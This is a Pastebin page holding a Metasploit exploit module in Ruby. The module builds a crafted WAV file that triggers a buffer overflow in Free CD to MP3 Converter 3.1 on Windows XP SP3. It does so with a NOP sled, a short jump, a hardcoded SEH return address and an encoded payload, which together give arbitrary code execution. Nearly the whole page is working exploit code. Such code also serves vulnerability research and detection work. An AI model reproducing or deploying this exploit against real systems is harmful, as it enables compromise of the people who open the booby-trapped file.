Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- require 'msf/core'
- class Metasploit3 < Msf::Exploit::Remote
- Rank = GoodRanking
- include Msf::Exploit::FILEFORMAT
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Free CD to MP3 Converter 3.1 Buffer Overflow',
- 'Description' => %q{
- This module exploits a buffer overflow in Free CD to MP3 Converter
- v3.1.
- When the application is used to import a specially crafted wav file,
- a buffer overflow occurs allowing arbitrary code execution.
- },
- 'License' => MSF_LICENSE,
- 'Author' =>
- [
- 'Original Exploit: C4SS!0 G0M3S',
- 'MSF Module : riusksk'
- ],
- 'Version' => '$Revision: 1.0 $',
- 'DefaultOptions'=>
- {
- 'EXITFUNC' => 'process',
- },
- 'Payload' =>
- {
- 'Space' => 500,
- 'BadChars' => "\x00"
- },
- 'Platform' => 'win',
- 'Targets' =>
- [
- [ 'Windows XP SP3 CN', {'Ret' => 0x00409F8C } ] # pop
- pop ret
- ],
- 'DefaultTarget' => 0,
- 'Privileged' => false,
- 'DisclosureDate'=> 'Nov 24 2010'
- ))
- register_options(
- [
- OptString.new('FILENAME', [ false, 'The file name.', 'exploit.wav']),
- ], self.class)
- end
- def exploit
- sploit = make_nops(4156)
- sploit << "\xEB\x06\x90\x90"
- sploit << [target.ret].pack('V')
- sploit << make_nops(5)
- sploit << payload.encoded
- print_status("Creating '#{datastore['FILENAME']}' file ...")
- file_create(sploit)
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement